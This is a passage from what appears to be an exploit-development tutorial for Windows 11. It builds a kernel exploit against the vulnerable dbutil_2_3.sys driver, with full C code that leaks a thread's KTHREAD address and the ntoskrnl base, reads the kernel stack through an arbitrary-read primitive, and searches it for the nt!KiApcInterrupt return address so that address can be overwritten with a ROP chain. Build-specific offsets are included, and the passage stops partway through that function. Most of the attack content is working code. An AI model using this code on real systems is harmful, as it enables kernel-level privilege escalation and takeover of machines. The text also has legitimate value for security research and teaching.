Now that we have a suspended thread, the goal is to leak the KTHREAD object associated with it, which is the kernel-mode representation of the thread. We can achieve this by invoking NtQuerySystemInformation. The first thing we need to do is add the structures required by NtQuerySystemInformation and then prototype this function, as we will need to resolve it via GetProcAddress. For this I just add a header file named ntdll.h, which will contain this prototype (and more structures coming up shortly).

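#include <Windows.h>
#include <Psapi.h>

// NTSTATUS values used by leakKTHREAD() (normally provided by ntstatus.h)
#ifndef STATUS_SUCCESS
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#endif

#ifndef STATUS_INFO_LENGTH_MISMATCH
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#endif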

typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemBasicInformation,
    SystemProcessorInformation,
    SystemPerformanceInformation,
    SystemTimeOfDayInformation,
    SystemPathInformation,
    SystemProcessInformation,
    SystemCallCountInformation,
    SystemDeviceInformation,
    SystemProcessorPerformanceInformation,
    SystemFlagsInformation,
    SystemCallTimeInformation,
    SystemModuleInformation,
    SystemLocksInformation,
    SystemStackTraceInformation,
    SystemPagedPoolInformation,
    SystemNonPagedPoolInformation,
    SystemHandleInformation,
    SystemObjectInformation,
    SystemPageFileInformation,
    SystemVdmInstemulInformation,
    SystemVdmBopInformation,
    SystemFileCacheInformation,
    SystemPoolTagInformation,
    SystemInterruptInformation,
    SystemDpcBehaviorInformation,
    SystemFullMemoryInformation,
    SystemLoadGdiDriverInformation,
    SystemUnloadGdiDriverInformation,
    SystemTimeAdjustmentInformation,
    SystemSummaryMemoryInformation,
    SystemMirrorMemoryInformation,
    SystemPerformanceTraceInformation,
    SystemObsolete0,
    SystemExceptionInformation,
    SystemCrashDumpStateInformation,
    SystemKernelDebuggerInformation,
    SystemContextSwitchInformation,
    SystemRegistryQuotaInformation,
    SystemExtendServiceTableInformation,
    SystemPrioritySeperation,
    SystemVerifierAddDriverInformation,
    SystemVerifierRemoveDriverInformation,
    SystemProcessorIdleInformation,
    SystemLegacyDriverInformation,
    SystemCurrentTimeZoneInformation,
    SystemLookasideInformation,
    SystemTimeSlipNotification,
    SystemSessionCreate,
    SystemSessionDetach,
    SystemSessionInformation,
    SystemRangeStartInformation,
    SystemVerifierInformation,
    SystemVerifierThunkExtend,
    SystemSessionProcessInformation,
    SystemLoadGdiDriverInSystemSpace,
    SystemNumaProcessorMap,
    SystemPrefetcherInformation,
    SystemExtendedProcessInformation,
    SystemRecommendedSharedDataAlignment,
    SystemComPlusPackage,
    SystemNumaAvailableMemory,
    SystemProcessorPowerInformation,
    SystemEmulationBasicInformation,
    SystemEmulationProcessorInformation,
    SystemExtendedHandleInformation,
    SystemLostDelayedWriteInformation,
    SystemBigPoolInformation,
    SystemSessionPoolTagInformation,
    SystemSessionMappedViewInformation,
    SystemHotpatchInformation,
    SystemObjectSecurityMode,
    SystemWatchdogTimerHandler,
    SystemWatchdogTimerInformation,
    SystemLogicalProcessorInformation,
    SystemWow64SharedInformation,
    SystemRegisterFirmwareTableInformationHandler,
    SystemFirmwareTableInformation,
    SystemModuleInformationEx,
    SystemVerifierTriageInformation,
    SystemSuperfetchInformation,
    SystemMemoryListInformation,
    SystemFileCacheInformationEx,
    MaxSystemInfoClass

} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 w018;
    WORD                 NameOffset;
    BYTE                 Name[256];
} SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags;
    USHORT Handle;
    void* Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;
    SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

// Prototype for ntdll!NtQuerySystemInformation
typedef NTSTATUS(WINAPI* NtQuerySystemInformation_t)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);

Calling NtQuerySystemInformation is simply the mechanism we use to leak the KTHREAD object, so we will not go over each of these structures in depth. However, it is worthwhile to talk about NtQuerySystemInformation itself.

NtQuerySystemInformation is a function which can be invoked from a medium-integrity process. However, certain “classes” from the SYSTEM_INFORMATION_CLASS enum aren’t available to low-integrity or AppContainer processes, such as browser sandboxes; in that scenario, you would need a genuine information leak. Since we are assuming medium integrity (the default integrity level for processes started by a standard user), we will leverage NtQuerySystemInformation.

We first create a function which resolves NtQuerySystemInformation.

/**
 * @brief Function to resolve ntdll!NtQuerySystemInformation.
 *
 * This function is used to resolve ntdll!NtQuerySystemInformation.
 * ntdll!NtQuerySystemInformation allows us to leak kernel-mode
 * memory, useful to our exploit, to user mode from a medium
 * integrity process.
 *
 * @param Void.
 * @return A pointer to ntdll!NtQuerySystemInformation.

 */
NtQuerySystemInformation_t resolveFunc(void)
{
	//
	// Obtain a handle to ntdll.dll (where NtQuerySystemInformation lives)
	//
	HMODULE ntdllHandle = GetModuleHandleW(L"ntdll.dll");

	//
	// Error handling
	//
	if (ntdllHandle == NULL)
	{
		// Bail out
		goto exit;
	}

	//
	// Resolve ntdll!NtQuerySystemInformation
	//
	NtQuerySystemInformation_t func = (NtQuerySystemInformation_t)GetProcAddress(
		ntdllHandle,
		"NtQuerySystemInformation"
	);

	//
	// Error handling
	//
	if (func == NULL)
	{
		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// Print update
		//
		printf("[+] ntdll!NtQuerySystemInformation: 0x%p\n", func);

		//
		// Return the address
		//
		return func;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an error
	//
	return (NtQuerySystemInformation_t)1;
}

After resolving the function, we can add a function which contains our “logic” for leaking the KTHREAD object associated with our “dummy thread”. This function, leakKTHREAD, accepts a single parameter: the handle of the thread whose object we want to leak (in this case, our “dummy thread”). It leverages the SystemHandleInformation class (which is blocked from low-integrity processes) to enumerate every handle on the system. From there, we only look at handles that belong to our current process and check each one against the handle of our “dummy thread”. The Object member of the matching entry is the thread's ETHREAD, whose first member is the KTHREAD, so both share the same address.

/**
 * @brief Function used to leak the KTHREAD object
 *
 * This function leverages NtQuerySystemInformation (by
 * calling resolveFunc() to get NtQuerySystemInformation's
 * location in memory) to leak the KTHREAD object associated
 * with our previously created "dummy thread"
 *
 * @param dummythreadHandle - A handle to the "dummy thread"
 * @return A pointer to the KTHREAD object
 */
ULONG64 leakKTHREAD(HANDLE dummythreadHandle)
{
	//
	// Set the NtQuerySystemInformation return value to STATUS_INFO_LENGTH_MISMATCH for call to NtQuerySystemInformation
	//
	NTSTATUS retValue = STATUS_INFO_LENGTH_MISMATCH;

	//
	// Resolve ntdll!NtQuerySystemInformation
	//
	NtQuerySystemInformation_t NtQuerySystemInformation = resolveFunc();

	//
	// Error handling
	//
	if (NtQuerySystemInformation == (NtQuerySystemInformation_t)1)
	{
		//
		// Print update
		//
		printf("[-] Error! Unable to resolve ntdll!NtQuerySystemInformation. Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Set size to 1 and loop the call until we reach the needed size
	//
	int size = 1;

	//
	// Output size
	//
	ULONG outSize = 0;

	//
	// Output buffer
	//
	PSYSTEM_HANDLE_INFORMATION out = (PSYSTEM_HANDLE_INFORMATION)malloc(size);

	//
	// Error handling
	//
	if (out == NULL)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// do/while to allocate enough memory necessary for NtQuerySystemInformation
	//
	do
	{
		//
		// Free the previous memory
		//
		free(out);

		//
		// Increment the size
		//
		size = size * 2;

		//
		// Allocate more memory with the updated size
		//
		out = (PSYSTEM_HANDLE_INFORMATION)malloc(size);

		//
		// Error handling
		//
		if (out == NULL)
		{
			//
			// Bail out
			//
			goto exit;
		}

		//
		// Invoke NtQuerySystemInformation
		//
		retValue = NtQuerySystemInformation(
			SystemHandleInformation,
			out,
			(ULONG)size,
			&outSize
		);
	} while (retValue == STATUS_INFO_LENGTH_MISMATCH);

	//
	// Verify the NTSTATUS code which broke the loop is STATUS_SUCCESS
	//
	if (retValue != STATUS_SUCCESS)
	{
		//
		// Is out == NULL? If so, malloc failed and we can't free this memory
		// If it is NOT NULL, we can assume this memory is allocated. Free
		// it accordingly
		//
		if (out != NULL)
		{
			//
			// Free the memory
			//
			free(out);

			//
			// Bail out
			//
			goto exit;
		}

		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// NtQuerySystemInformation should have succeeded
		// Parse all of the handles, find the current thread handle, and leak the corresponding object
		//
		for (ULONG i = 0; i < out->NumberOfHandles; i++)
		{
			//
			// Store the current object's type number
			// Thread object = 0x8
			//
			DWORD objectType = out->Handles[i].ObjectTypeNumber;

			//
			// Are we dealing with a handle from the current process?
			//
			if (out->Handles[i].ProcessId == GetCurrentProcessId())
			{
				//
				// Is the handle the handle of the "dummy" thread we created?
				//
				if (dummythreadHandle == (HANDLE)out->Handles[i].Handle)
				{
					//
					// Grab the actual KTHREAD object corresponding to the current thread
					//
					ULONG64 kthreadObject = (ULONG64)out->Handles[i].Object;

					//
					// Free the memory
					//
					free(out);

					//
					// Return the KTHREAD object
					//
					return kthreadObject;
				}
			}
		}

		//
		// The "dummy thread" handle wasn't found - free the buffer before bailing out
		//
		free(out);
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Close the handle to the "dummy thread"
	//
	CloseHandle(
		dummythreadHandle
	);

	//
	// Return the NTSTATUS error
	//
	return (ULONG64)retValue;
}
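The do/while loop in leakKTHREAD() follows a common pattern for NtQuerySystemInformation: keep doubling the buffer until the call stops returning STATUS_INFO_LENGTH_MISMATCH. The sketch below isolates that pattern so it can be run anywhere. mockQuery() is a hypothetical stand-in for NtQuerySystemInformation that simply requires 100 bytes, and int32_t stands in for NTSTATUS.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* NTSTATUS values as defined in ntstatus.h (int32_t stands in for NTSTATUS) */
#define STATUS_SUCCESS              ((int32_t)0x00000000)
#define STATUS_INFO_LENGTH_MISMATCH ((int32_t)0xC0000004)
#define STATUS_NO_MEMORY            ((int32_t)0xC0000017)

/* Hypothetical stand-in for NtQuerySystemInformation that needs 100 bytes */
static const uint32_t requiredSize = 100;

static int32_t mockQuery(void *buffer, uint32_t length, uint32_t *returnLength)
{
    *returnLength = requiredSize;
    if (length < requiredSize)
        return STATUS_INFO_LENGTH_MISMATCH;
    memset(buffer, 0, requiredSize); /* pretend to fill in the information */
    return STATUS_SUCCESS;
}

/* Same shape as the loop in leakKTHREAD(): start at 1 byte, double on mismatch */
static void *queryWithGrowth(uint32_t *finalSize, int32_t *status)
{
    uint32_t size = 1;
    uint32_t outSize = 0;
    void *out = NULL;

    do
    {
        free(out); /* free(NULL) is a no-op on the first pass */
        size *= 2;
        out = malloc(size);
        if (out == NULL)
        {
            *status = STATUS_NO_MEMORY;
            return NULL;
        }
        *status = mockQuery(out, size, &outSize);
    } while (*status == STATUS_INFO_LENGTH_MISMATCH);

    if (*status != STATUS_SUCCESS)
    {
        free(out);
        return NULL;
    }

    *finalSize = size;
    return out;
}
```

With a 100-byte requirement, the loop tries 2, 4, ..., 64 bytes and succeeds at 128. Allocating exactly the ReturnLength reported by the failed call is a common alternative, but the system handle table can grow between two calls, so a retry loop is needed either way.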

Here is how our main() function looks now:

/**
 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
 */
int main(void)
{
	//
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	//
	HANDLE driverHandle = getHandle();

	//
	// Error handling
	//
	if (driverHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

	//
	// Invoke createdummyThread() to create our "dummy thread"
	//
	HANDLE getthreadHandle = createdummyThread();

	//
	// Error handling
	//
	if (getthreadHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't create the \"dummy thread\". Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Created the \"dummy thread\"!\n");

	//
	// Invoke leakKTHREAD()
	//
	ULONG64 kthread = leakKTHREAD(getthreadHandle);

	//
	// Error handling: on failure leakKTHREAD() returns 0 (handle not found) or a
	// negative NTSTATUS cast to ULONG64, which sign-extends (e.g. 0xffffffffc0000004)
	//
	if (kthread == 0 || (kthread & 0xffffffff00000000ULL) == 0xffffffff00000000ULL)
	{
		//
		// Print update
		// kthread is 0 or an NTSTATUS code if execution reaches here
		//
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Error handling (kthread isn't an NTSTATUS code - but is it a kernel-mode address?)
	//
	else if ((kthread & 0xffff800000000000ULL) != 0xffff800000000000ULL)
	{
		//
		// Print update
		// kthread isn't a kernel-mode address if execution reaches here
		//
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] \"Dummy thread\" KTHREAD object: 0x%llx\n", kthread);

	//
	// getchar() to pause execution
	//
	getchar();

	//
	// Return success
	//
	return 0;

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an error
	//
	return 1;
}
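The error handling in main() has to tell a leaked pointer apart from what leakKTHREAD() returns on failure. That is either 0 (the handle was not found, so retValue still holds STATUS_SUCCESS) or a negative NTSTATUS converted with (ULONG64)retValue, which sign-extends. The platform-independent sketch below shows that distinction. NT_SUCCESS mirrors the macro from the Windows headers. looksLikeKernelPointer() is a hypothetical helper, and its checks are heuristics: the canonical kernel half starts at 0xffff800000000000, and any value whose upper 32 bits are all set is treated as an NTSTATUS.

```c
#include <stdint.h>

/* Same test as the NT_SUCCESS macro in the Windows headers (int32_t stands in for NTSTATUS) */
#define NT_SUCCESS(Status) (((int32_t)(Status)) >= 0)

/* Mirrors "return (ULONG64)retValue;": converting a negative int32_t to uint64_t sign-extends */
static uint64_t widenStatus(int32_t status)
{
    return (uint64_t)status;
}

/* Hypothetical helper: 0 and sign-extended NTSTATUS codes are failures,
   otherwise require an address in the canonical kernel half */
static int looksLikeKernelPointer(uint64_t value)
{
    if (value == 0)
        return 0;
    if ((value & 0xffffffff00000000ULL) == 0xffffffff00000000ULL)
        return 0; /* upper 32 bits all set: treated as a widened NTSTATUS */
    return (value & 0xffff800000000000ULL) == 0xffff800000000000ULL;
}
```

For example, STATUS_INFO_LENGTH_MISMATCH (0xC0000004) widens to 0xffffffffc0000004, while the KTHREAD leaked in this post (0xffffa50f0fdb8080) passes the kernel-address check.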

You’ll notice in the above code we have added a getchar() call - which will keep our .exe running after the KTHREAD object is leaked. After running the .exe, we can see we leaked the KTHREAD object of our “dummy thread” at 0xffffa50f0fdb8080. Using WinDbg we can parse this address as a KTHREAD object.

We have now successfully located the KTHREAD object associated with our “dummy” thread.

From KTHREAD Leak To Arbitrary Kernel-Mode API Calls

With our KTHREAD leak, we can also use the !thread WinDbg extension to reveal the call stack for this thread.

You’ll notice the function nt!KiApcInterrupt is a part of this kernel-mode call stack for our “dummy thread”. What is this?

Recall that our “dummy thread” is in a suspended state. When a thread is created on Windows, it first starts out running in kernel-mode. nt!KiStartUserThread is responsible for this (and we can see this in our call stack). This eventually results in nt!PspUserThreadStartup being called - which is the initial thread routine, according to Windows Internals Part 1: 7th Edition. Here is where things get interesting.

After the thread is created, it is put into its “suspended state”. On Windows, a suspended thread is essentially a thread which has an APC queued to it, with the APC “telling the thread” to “do nothing”. An APC is a way to “tack on” some work to a given thread, to be performed when the thread is scheduled to execute. What is interesting is that queuing an APC causes an interrupt to be issued. An interrupt is essentially a signal that tells a processor something requires immediate attention. Each processor runs at a given interrupt request level, or IRQL. APCs get processed at an IRQL known as APC_LEVEL, or 1. IRQL values span from 0 to 15 on x64 (0 to 31 on x86), but the most “common” ones are PASSIVE_LEVEL (0), APC_LEVEL (1), and DISPATCH_LEVEL (2). Normal user-mode and kernel-mode code run at PASSIVE_LEVEL. When a processor's IRQL is at APC_LEVEL (1), for instance, only interrupts that are processed at a higher IRQL can interrupt the processor. So, if the processor is running at APC_LEVEL, normal PASSIVE_LEVEL code won’t run until the processor is brought back down to PASSIVE_LEVEL.

The function that is called directly before nt!KiApcInterrupt in our call stack is, as mentioned, nt!PspUserThreadStartup - which is the “initial thread routine”. If we examine this return address nt!PspUserThreadStartup + 0x48, we can see the following.

The return address contains the instruction mov rsi, gs:188h. This loads the value stored at gs:[188h]. When in kernel mode, the GS segment base points to the KPCR structure, which embeds the KPRCB structure at an offset of 0x180. The KPRCB holds a pointer to the current thread at an offset of 0x8 - so 0x180 + 0x8 = 0x188. This means that gs:[188h] holds a pointer to the current thread.
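The gs:188h arithmetic can be checked with mock structures. In the sketch below, padding arrays stand in for whatever fields actually precede each member. The real _KPCR and _KPRCB definitions are far larger and build-specific, and only the 0x180 and 0x8 offsets are taken from the text. The sketch also reflects that Prcb is embedded in the KPCR rather than pointed to, which is why the two offsets simply add up.

```c
#include <stddef.h>
#include <stdint.h>

/* Mock layouts (not the real Windows definitions): padding arrays stand in
   for the fields that precede each member of interest. */
typedef struct _MOCK_KPRCB {
    uint8_t precedingFields[0x8];
    void   *CurrentThread;          /* KPRCB + 0x8 */
} MOCK_KPRCB;

typedef struct _MOCK_KPCR {
    uint8_t    precedingFields[0x180];
    MOCK_KPRCB Prcb;                /* KPCR + 0x180, embedded rather than a pointer */
} MOCK_KPCR;

/* Offset that "mov rsi, gs:188h" reads relative to the KPCR base held in GS */
static size_t currentThreadOffset(void)
{
    return offsetof(MOCK_KPCR, Prcb) + offsetof(MOCK_KPRCB, CurrentThread);
}
```

Reading a pointer at KPCR base + currentThreadOffset() therefore yields Prcb.CurrentThread, which is what the single mov instruction does through the GS segment.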

When a function is called, a return address is placed onto the stack. The return address is simply the address of the next instruction to execute. Recall from our IDA screenshot that mov rsi, gs:188h is the instruction at the return address, meaning it was the “next” instruction to be executed when the return address was pushed onto the stack. What this means is that the instruction before mov rsi, gs:188h caused the “function call” (or change in control flow) to nt!KiApcInterrupt. That instruction, mov cr8, r15, was responsible for this. Why is this important?

Control registers are per-processor registers. The CR8 control register manages the current IRQL value for a given processor. So, whatever value is in R15 at the time of this instruction becomes the IRQL that the current processor executes at. How can we know what level this is? All we have to do is look at our call stack again!

The function that was called after nt!PspUserThreadStartup was nt!KiApcInterrupt. As the name suggests, this function is responsible for handling an APC interrupt! We know APC interrupts are processed at IRQL APC_LEVEL, or 1. However, we also know that only interrupts which are processed at a higher IRQL than the processor's current IRQL can cause the processor to be interrupted.

Since we can see that an APC interrupt was dispatched, we can confirm that the processor must have been executing at IRQL 0, or PASSIVE_LEVEL, which allowed the APC interrupt to occur. This, again, comes back to the fact that queuing an APC causes an interrupt. Since APCs are processed at IRQL APC_LEVEL (1), the processor must be executing at PASSIVE_LEVEL (0) in order for an APC interrupt to be delivered.

If we look at the return address nt!KiApcInterrupt+0x328, we can see that it is associated with a trap frame (TrapFrame @ ffffa385bba350a0), which is basically a representation of the state of execution when an interrupt takes place. If we examine this trap frame, we can see that RIP was executing the instruction after the mov cr8, r15 instruction, which is where the APC interrupt was dispatched. This means that when nt!PspUserThreadStartup executed mov cr8, r15, it allowed things like APCs to start interrupting execution on the processor!

We can come to the conclusion that nt!KiApcInterrupt was executed as a result of the mov cr8, r15 instruction from nt!PspUserThreadStartup, which lowered the current processor's IRQL to PASSIVE_LEVEL (0). Since APCs are processed at APC_LEVEL (1), this allowed the interrupt to occur, because the processor was executing at a lower IRQL than the interrupt.
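The IRQL reasoning above can be condensed into a toy model. This is a deliberate simplification and not how the kernel implements interrupt delivery. CpuModel, canInterrupt() and setIrql() are hypothetical names, the irql field plays the role of CR8, and a single flag represents the pending APC interrupt.

```c
#include <stdbool.h>
#include <stdint.h>

/* IRQL numbers as used on Windows */
#define PASSIVE_LEVEL  0
#define APC_LEVEL      1
#define DISPATCH_LEVEL 2

/* Simplified rule: an interrupt is delivered only if its IRQL is
   strictly higher than the processor's current IRQL. */
static bool canInterrupt(uint8_t currentIrql, uint8_t interruptIrql)
{
    return interruptIrql > currentIrql;
}

typedef struct {
    uint8_t irql;     /* models the CR8 register */
    bool apcPending;  /* an APC interrupt has been requested */
} CpuModel;

/* Models "mov cr8, r15": set the new IRQL, then deliver a pending APC
   interrupt if the new level allows it. Returns true if the APC fired. */
static bool setIrql(CpuModel *cpu, uint8_t newIrql)
{
    cpu->irql = newIrql;
    if (cpu->apcPending && canInterrupt(cpu->irql, APC_LEVEL))
    {
        cpu->apcPending = false;
        return true;
    }
    return false;
}
```

In this model, a processor sitting at APC_LEVEL with an APC pending does not take the interrupt until setIrql() lowers it to PASSIVE_LEVEL, which is the role mov cr8, r15 plays in nt!PspUserThreadStartup.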

The point of examining this is to understand that an interrupt occurred as a result of the APC being queued on our “dummy” thread. This APC is basically telling the thread to “do nothing”, which is essentially what a suspended thread is. Here is where this comes into play for us.

When this thread is resumed, the thread will return from the nt!KiApcInterrupt function. So, we can overwrite the return address on the stack for nt!KiApcInterrupt with the address of a ROP gadget (the return address on the system used for this blog post is nt!KiApcInterrupt + 0x328, but that could be subject to change). Then, when we eventually resume the thread (which can be done from user mode), nt!KiApcInterrupt will return and use our ROP gadget as the return address. This will allow us to construct a ROP chain which calls arbitrary kernel-mode APIs! The key, first, is to use our leaked KTHREAD object and parse its StackBase member, using our arbitrary read primitive, to locate the stack (where this return address lives). To do this, we will begin with the prototype for our final “exploit” function, titled constructROPChain().

Notice the last parameter our function receives - ULONG64 ntBase. Since we are going to be using ROP gadgets from ntoskrnl.exe, we need to locate the base address of ntoskrnl.exe in order to resolve our needed ROP gadgets. This means we also need a function which resolves the base of ntoskrnl.exe using EnumDeviceDrivers. Here is how we implement this functionality.

/**
 * @brief Function used to resolve the base address of ntoskrnl.exe.
 * @param Void.
 * @return ntoskrnl.exe base
 */
ULONG64 resolventBase(void)
{
	//
	// Array to receive kernel-mode addresses
	//
	LPVOID* lpImageBase = NULL;

	//
	// Size of the input array
	//
	DWORD cb = 0;

	//
	// Size of the array output (all load addresses).
	//
	DWORD lpcbNeeded = 0;

	//
	// Invoke EnumDeviceDrivers (and have it fail)
	// to receive the needed size of lpImageBase
	//
	EnumDeviceDrivers(
		lpImageBase,
		cb,
		&lpcbNeeded
	);

	//
	// lpcbNeeded should contain needed size
	//
	lpImageBase = (LPVOID*)malloc(lpcbNeeded);

	//
	// Error handling
	//
	if (lpImageBase == NULL)
	{
		//
		// Bail out
		// 
		goto exit;
	}

	//
	// Assign lpcbNeeded to cb (cb needs to be size of the lpImageBase
	// array).
	//
	cb = lpcbNeeded;

	//
	// Invoke EnumDeviceDrivers properly.
	//
	BOOL getAddrs = EnumDeviceDrivers(
		lpImageBase,
		cb,
		&lpcbNeeded
	);

	//
	// Error handling
	//
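	if (!getAddrs)
	{
		//
		// Free the array and bail out
		//
		free(lpImageBase);
		goto exit;
	}

	//
	// The first element of the array is ntoskrnl.exe.
	// Save it so the array can be freed before returning.
	//
	ULONG64 ntBase = (ULONG64)lpImageBase[0];
	free(lpImageBase);

	return ntBase;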

//
// Execution reaches here if an error occurs
//
exit:

	//
	// Return an error.
	//
	return (ULONG64)1;
}

The above function called resolventBase() returns the base address of ntoskrnl.exe (this type of enumeration couldn’t be done in a low-integrity process. Again, we are assuming medium integrity). This value can then be passed in to our constructROPChain() function.

If we examine the contents of a KTHREAD structure, we can see that StackBase is located at an offset of 0x38 within the KTHREAD structure. This means we can use our arbitrary read primitive to leak the base of the thread's kernel-mode stack by reading the 8 bytes at KTHREAD + 0x38.

We can then update main() to resolve ntoskrnl.exe and to leak our kernel-mode stack (while leaving getchar() in place to confirm we can leak the stack before the process which houses our “dummy thread” terminates).

/**
 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
 */
int main(void)
{
	//
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	//
	HANDLE driverHandle = getHandle();

	//
	// Error handling
	//
	if (driverHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

	//
	// Invoke createdummyThread() to create our "dummy thread"
	//
	HANDLE getthreadHandle = createdummyThread();

	//
	// Error handling
	//
	if (getthreadHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't create the \"dummy thread\". Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Created the \"dummy thread\"!\n");

	//
	// Invoke leakKTHREAD()
	//
	ULONG64 kthread = leakKTHREAD(getthreadHandle);

	//
	// Error handling: on failure leakKTHREAD() returns 0 (handle not found) or a
	// negative NTSTATUS cast to ULONG64, which sign-extends (e.g. 0xffffffffc0000004)
	//
	if (kthread == 0 || (kthread & 0xffffffff00000000ULL) == 0xffffffff00000000ULL)
	{
		//
		// Print update
		// kthread is 0 or an NTSTATUS code if execution reaches here
		//
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Error handling (kthread isn't an NTSTATUS code - but is it a kernel-mode address?)
	//
	else if ((kthread & 0xffff800000000000ULL) != 0xffff800000000000ULL)
	{
		//
		// Print update
		// kthread isn't a kernel-mode address if execution reaches here
		//
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] \"Dummy thread\" KTHREAD object: 0x%llx\n", kthread);

	//
	// Invoke resolventBase() to retrieve the load address of ntoskrnl.exe
	//
	ULONG64 ntBase = resolventBase();

	//
	// Error handling
	//
	if (ntBase == (ULONG64)1)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// Invoke constructROPChain() to build our ROP chain and kick off execution
	//
	BOOL createROP = constructROPChain(driverHandle, getthreadHandle, kthread, ntBase);

	//
	// Error handling
	//
	if (!createROP)
	{
		//
		// Print update
		//
		printf("[-] Error! Unable to construct the ROP chain. Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// getchar() to pause execution
	//
	getchar();

	//
	// Return success
	//
	return 0;

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an error
	//
	return 1;
}

After running the exploit (in its current state) we can see that we successfully leaked the stack for our “dummy thread” - located at 0xffffa385b8650000.

Recall also that the stack grows towards lower memory addresses, meaning that the stack base itself usually won’t have memory paged in/committed. Instead, we have to walk “up” the stack (by going down in memory, since the stack grows towards lower addresses) to see the contents of the “dummy thread’s” stack.

Putting all of this together, we can extend our constructROPChain() function to search the dummy thread’s stack for the target return address of nt!KiApcInterrupt + 0x328. On the build of Windows 11 I am testing this exploit on, nt!KiApcInterrupt + 0x328 is located at an offset of 0x41b718 from the base of ntoskrnl.exe.

/**
 * @brief Function used to write a ROP chain to the kernel-mode stack
 *
 * This function takes the previously-leaked KTHREAD object of
 * our "dummy thread", extracts the StackBase member of the object
 * and writes the ROP chain to the kernel-mode stack leveraging the
 * write64() function.
 *
 * @param inHandle - A valid handle to the dbutil_2_3.sys.
 * @param dummyThread - A valid handle to our "dummy thread" in order to resume it.
 * @param KTHREAD - The KTHREAD object associated with the "dummy" thread.
 * @param ntBase - The base address of ntoskrnl.exe.
 * @return Result of the operation in the form of a boolean.
 */
BOOL constructROPChain(HANDLE inHandle, HANDLE dummyThread, ULONG64 KTHREAD, ULONG64 ntBase)
{
	//
	// KTHREAD.StackBase = KTHREAD + 0x38
	//
	ULONG64 kthreadstackBase = KTHREAD + 0x38;

	//
	// Dereference KTHREAD.StackBase to leak the stack
	//
	ULONG64 stackBase = read64(inHandle, kthreadstackBase);

	//
	// Error handling
	//
	if (stackBase == (ULONG64)1)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Leaked kernel-mode stack: 0x%llx\n", stackBase);

	//
	// Variable to store our target return address for nt!KiApcInterrupt
	//
	ULONG64 retAddr = 0;

	//
	// Leverage the arbitrary read primitive to read the contents of the stack (seven pages = 0x7000).
	// The page at StackBase itself isn't committed, so we start at StackBase - 0x8 and walk towards
	// the lower addresses, since the stack grows towards the lower addresses.
	//
	for (int i = 0x8; i < 0x7000 - 0x8; i += 0x8)
	{
		//
		// Invoke read64() to dereference the stack
		//
		ULONG64 value = read64(inHandle, stackBase - i);

		//
		// Kernel-mode address?
		//
		if ((value & 0xfffff00000000000) == 0xfffff00000000000)
		{
			//
			// nt!KiApcInterrupt+0x328?
			//
			if (value == ntBase + 0x41b718)
			{
				//
				// Print update
				//
